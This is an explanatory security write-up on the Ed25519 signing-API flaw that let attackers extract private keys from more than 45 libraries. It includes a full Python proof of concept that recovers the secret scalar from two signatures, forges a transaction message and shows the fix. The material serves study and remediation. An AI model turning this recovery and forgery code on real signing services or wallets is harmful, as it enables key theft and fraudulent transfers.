A critical vulnerability in implementations of the Ed25519 digital signature algorithm exposed private keys in dozens of cryptography libraries, primarily affecting blockchain and cryptocurrency platforms. The flaw is not in Ed25519 itself but in an insecure signing-API shape that let an attacker use the signing function as an oracle and extract the private key[1][3].
Technical Breakdown
The vulnerability occurs when a library exposes a non-standard signing function that takes the public key as an input parameter alongside the private key. The optimization avoids recomputing the public key on every call (reported to save about half of the signing time[1][3]), but over 45 libraries failed to check that the supplied public key actually belonged to the private key[2]. Ed25519 derives its nonce r deterministically from the private key and the message alone, while the challenge hash H(R, A, M) also includes the public key A. If A is caller-controlled, an attacker can:
- Request a signature on a message M with the genuine public key A, then request a signature on the same M with a substituted public key A'
- Observe that both signatures carry the same R (the nonce r did not change) but different challenge values h = H(R, A, M) and h' = H(R, A', M), both computable from public data
- Solve S - S' = (h - h')·a mod L for the secret scalar a; two signing queries suffice, and a alone is enough to forge signatures on arbitrary messages, since a verifier never learns the nonce prefix[1][2][3]
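The attack above, carried through end to end in pure Python, as an added example that is not code from the article or from any of the affected libraries. It implements the RFC 8032 field and point arithmetic, a signing function with the flawed `sign(msg, pub, seed)` parameter shape, the two-query scalar recovery, a forgery made with the recovered scalar, and the fix (recompute the public key and reject a mismatch). The function names, the seed, the message and the bogus public key are all constructed for the demo and are not taken from any real library or incident.

```python
import hashlib
import os

# edwards25519 constants (RFC 8032 section 5.1).
p = 2**255 - 19
q = 2**252 + 27742317777372353535851937790883648493   # group order L
d = -121665 * pow(121666, p - 2, p) % p
SQRT_M1 = pow(2, (p - 1) // 4, p)

def sha512(b):
    return hashlib.sha512(b).digest()

def add(P, Q):
    """Point addition in extended twisted Edwards coordinates (X, Y, Z, T)."""
    A = (P[1] - P[0]) * (Q[1] - Q[0]) % p
    B = (P[1] + P[0]) * (Q[1] + Q[0]) % p
    C = 2 * P[3] * Q[3] * d % p
    D = 2 * P[2] * Q[2] % p
    E, F, Gg, H = B - A, D - C, D + C, B + A
    return (E * F % p, Gg * H % p, F * Gg % p, E * H % p)

def mul(s, P):  # double-and-add; not constant time, demo only
    Q = (0, 1, 1, 0)
    while s:
        if s & 1: Q = add(Q, P)
        P, s = add(P, P), s >> 1
    return Q

def eq(P, Q):  # projective point equality
    return (P[0] * Q[2] - Q[0] * P[2]) % p == 0 and (P[1] * Q[2] - Q[1] * P[2]) % p == 0

def recover_x(y, sign):
    """Recover x from y and the sign bit (RFC 8032 section 5.1.3)."""
    x2 = (y * y - 1) * pow(d * y * y + 1, p - 2, p) % p
    x = pow(x2, (p + 3) // 8, p)
    if (x * x - x2) % p: x = x * SQRT_M1 % p
    if (x * x - x2) % p: raise ValueError("not a curve point")
    return p - x if (x & 1) != sign else x

def compress(P):
    zinv = pow(P[2], p - 2, p)
    x, y = P[0] * zinv % p, P[1] * zinv % p
    return (y | ((x & 1) << 255)).to_bytes(32, "little")

def decompress(b):
    y = int.from_bytes(b, "little")
    x = recover_x(y & ((1 << 255) - 1), y >> 255)
    y &= (1 << 255) - 1
    return (x, y, 1, x * y % p)

Gy = 4 * pow(5, p - 2, p) % p
G = (recover_x(Gy, 0), Gy, 1, recover_x(Gy, 0) * Gy % p)   # base point B

def expand(seed):
    """RFC 8032 section 5.1.5: clamped scalar a and nonce prefix from the 32-byte seed."""
    h = sha512(seed)
    a = (int.from_bytes(h[:32], "little") & ((1 << 254) - 8)) | (1 << 254)
    return a, h[32:]

def pubkey(seed):
    return compress(mul(expand(seed)[0], G))

def challenge(msg, pub, R):  # h = H(R, A, M) mod L; A is whatever bytes are passed as pub
    return int.from_bytes(sha512(R + pub + msg), "little") % q

def sign_unsafe(msg, pub, seed):
    """The flawed API shape: hashes the caller-supplied 'pub' without checking it."""
    a, prefix = expand(seed)
    r = int.from_bytes(sha512(prefix + msg), "little") % q   # depends only on seed and msg
    R = compress(mul(r, G))
    return R + ((r + challenge(msg, pub, R) * a) % q).to_bytes(32, "little")

def sign_safe(msg, pub, seed):
    """The fix: recompute the public key from the private key and reject a mismatch."""
    if pub != pubkey(seed):
        raise ValueError("public key does not belong to this private key")
    return sign_unsafe(msg, pub, seed)

def verify(msg, pub, sig):
    R, S = sig[:32], int.from_bytes(sig[32:], "little")
    return S < q and eq(mul(S, G), add(decompress(R), mul(challenge(msg, pub, R), decompress(pub))))

def recover_scalar(msg, pub, sig1, fake_pub, sig2):
    """Same msg twice with different 'pub': same R, different h, solve S - S' = (h - h')a."""
    assert sig1[:32] == sig2[:32], "R differs; the attack needs the same message both times"
    S1, S2 = int.from_bytes(sig1[32:], "little"), int.from_bytes(sig2[32:], "little")
    h1, h2 = challenge(msg, pub, sig1[:32]), challenge(msg, fake_pub, sig2[:32])
    return (S1 - S2) * pow(h1 - h2, q - 2, q) % q

def forge(msg, pub, a):
    """With the scalar a (mod L) any message can be signed; the nonce prefix is never needed."""
    r = int.from_bytes(os.urandom(32), "little") % q
    R = compress(mul(r, G))
    return R + ((r + challenge(msg, pub, R) * a) % q).to_bytes(32, "little")

def demo():
    seed = b"\x01" * 32            # constructed demo key, not a real one
    pub, msg = pubkey(seed), b"transfer 1 coin to alice"
    fake_pub = bytes(32)           # any 32 bytes the unsafe API will hash as "A"
    a = recover_scalar(msg, pub, sign_unsafe(msg, pub, seed),
                       fake_pub, sign_unsafe(msg, fake_pub, seed))
    evil = b"transfer 1000 coins to mallory"
    forged_ok = verify(evil, pub, forge(evil, pub, a))
    try:
        sign_safe(msg, fake_pub, seed)
        blocked = False
    except ValueError:
        blocked = True
    # the clamped scalar exceeds L, so compare the recovered value modulo L
    return a == expand(seed)[0] % q, forged_ok, blocked
```

`demo()` returns `(True, True, True)`: the scalar is recovered exactly from two signatures, the forgery on a message the victim never signed verifies under the victim's real public key, and the checked signing function refuses the substituted key. Note that the check in `sign_safe` costs the scalar multiplication the optimization was meant to avoid; an API that takes only the seed (or a keypair object whose public half is derived, never caller-set) is the cleaner fix.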
Impact & Remediation
- Affected: 45+ libraries including cryptocurrency wallets and fintech APIs[2][3]
- Patched: 8 libraries as of May 2023 (e.g., Trezor, PASETO)[2]
- Attack Surface: Crypto wallets, blockchain nodes, IoT devices using vulnerable implementations; the attacker only needs to obtain two signatures over the same message with different public keys, which any service that signs on behalf of callers and lets them supply the key material makes possible[1]
- Remediation: remove the public-key parameter from the signing API, or have the signing function recompute the public key from the private key and reject a mismatch; callers stuck on a vulnerable version must make sure the public key they pass in can never be attacker-influenced[2]
Security Implications
The vulnerability turns Ed25519's design choices against it:
- Deterministic nonces were adopted to eliminate the RNG failures that broke ECDSA deployments, but determinism also guarantees that the same message yields the same r; an API that lets the other hash input (the public key) vary therefore reproduces classic nonce reuse[1][3]
- The performance gain from public-key precomputation introduced a new, unvalidated input into a security-critical computation[1]
- The same two-signature algebra that leaked Sony's PlayStation 3 ECDSA signing key through a reused nonce resurfaced in modern systems[1][3]
Summary
A widespread implementation flaw in Ed25519 libraries allowed private key theft through API-based oracle attacks, affecting 45+ cryptographic implementations. While some projects have patched the vulnerability, the incident highlights a recurring difficulty in implementing cryptographic optimizations securely: a performance shortcut that accepts extra input must validate that input as strictly as the algorithm it replaces. The persistence of the same nonce-reuse failure across decades (from ECDSA to Ed25519) underscores the need for formal verification and for APIs that cannot be misused in cryptographic software[1][2][3].
Citations:
[1] https://www.blackhatethicalhacking.com/news/dozens-of-cryptography-libraries-vulnerable-to-private-key-theft/
[2] https://github.com/MystenLabs/ed25519-unsafe-libs
[3] https://portswigger.net/daily-swig/dozens-of-cryptography-libraries-vulnerable-to-private-key-theft
[4] https://cure53.de/pentest-report_ed25519.pdf
[5] https://polubelova.github.io/files/phd_slides.pdf
[6] https://arxiv.org/abs/2107.04940